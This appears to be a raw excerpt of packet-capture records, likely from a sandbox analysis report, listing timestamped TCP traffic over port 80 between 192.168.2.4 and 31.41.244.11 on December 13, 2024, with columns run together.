                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.254750013 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.254801035 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.254946947 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.254996061 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.255024910 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.255072117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.256077051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.256134987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.256701946 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.256757021 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.257143021 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.257190943 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.257790089 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.257842064 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.258280039 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.258328915 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.258531094 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.258580923 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.259296894 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.259344101 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.259347916 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.259397984 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.260412931 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.260469913 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.261276007 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.261331081 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.261501074 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.261516094 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.261542082 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.261554956 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.262551069 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.262593985 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.262860060 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.262900114 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.263686895 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.263732910 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.263762951 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.263803005 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.264717102 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.264761925 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.265002012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.265043020 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.265791893 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.265836000 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.266006947 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.266048908 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.266938925 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.266984940 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.266998053 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.267038107 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.268001080 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.268048048 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.268388033 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.268429995 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.269146919 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.269195080 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.269334078 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.269381046 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.270160913 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.270205975 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.270246983 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.270296097 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.271353960 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.271370888 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.271399975 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.271413088 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.272344112 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.272753000 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.272802114 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.273538113 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.273555994 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.273607969 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.274563074 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.274580002 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.274617910 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.274636030 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.275775909 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.275959969 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.276011944 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.276705027 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.276756048 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.276762009 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.276807070 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.277770042 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.277822018 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.278898954 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.278918028 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.278942108 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.278958082 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.278979063 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.279948950 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.280076981 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.280474901 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.280519962 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.281043053 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.281073093 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.281095982 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.281111956 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.282141924 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.282169104 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.282207966 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.282223940 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.283276081 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.283308029 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.283329010 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.283346891 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.284291029 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.284342051 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.284658909 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.285062075 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.285339117 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.285521030 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.285568953 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.286487103 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.286531925 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.286633968 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.286708117 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.287548065 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.287722111 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.287900925 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.287950039 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.288647890 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.288662910 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.288696051 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.288716078 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.289731979 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.289824009 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.290958881 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.290977001 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.291022062 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.291102886 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.291141987 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.291878939 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.291965961 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.427017927 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.427114964 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.427165031 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.427211046 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.427550077 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.427601099 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.427690029 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.427733898 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.428649902 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.428698063 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.428939104 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.428982973 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.429729939 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.429779053 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.429821014 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.429863930 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.430829048 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.430875063 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.431247950 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.431294918 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.431952953 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.431998014 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.432169914 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.432214022 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.433012009 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.433058023 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.433063030 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.433105946 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.434068918 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.434113979 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.434911966 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.434957981 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.435221910 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.435240984 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.435262918 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.435285091 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.436280012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.436330080 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.436682940 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.436723948 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.437470913 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.437519073 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.437689066 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.437731981 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.438458920 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.438507080 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.438576937 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.438621044 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.439517021 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.439563990 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.439974070 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.440020084 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.440658092 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.440701962 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.441035986 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.441082001 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.441808939 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.441853046 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.441895962 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.441936016 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.443109989 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.443157911 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.444174051 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.444220066 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.444221020 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.444242001 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.444261074 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.444272995 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.445163012 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.445209980 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.445389032 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.445434093 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.446032047 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.446074963 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.446597099 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.446640015 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.447128057 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.447170973 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.447344065 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.447386980 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.448201895 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.448246956 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.449130058 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.449176073 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.449275970 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.449317932 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.449672937 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.449716091 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.450440884 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.450463057 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.450483084 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.450496912 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.451571941 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.451596022 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.451617002 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.451627016 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.452838898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.452887058 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.453037024 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.453079939 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.453682899 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.453701973 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.453722954 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.453739882 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.454749107 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.454794884 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.455602884 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.455648899 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.455801010 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.455845118 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.455924034 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.455965042 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.456908941 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.456959009 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.457007885 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.457046986 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.458000898 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.458048105 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.458950996 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.459003925 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.459091902 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.459146976 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.460009098 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.460053921 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.460237026 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.460257053 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.460282087 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.460298061 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.461239100 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.461283922 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.461796045 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.461838961 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.462347984 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.462393999 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.462428093 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.462466955 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.463432074 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.463474035 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.463495016 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.463536024 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.464648008 CET804976331.41.244.11192.168.2.4
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.464692116 CET4976380192.168.2.431.41.244.11
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:19.464734077 CET804976331.41.244.11192.168.2.4
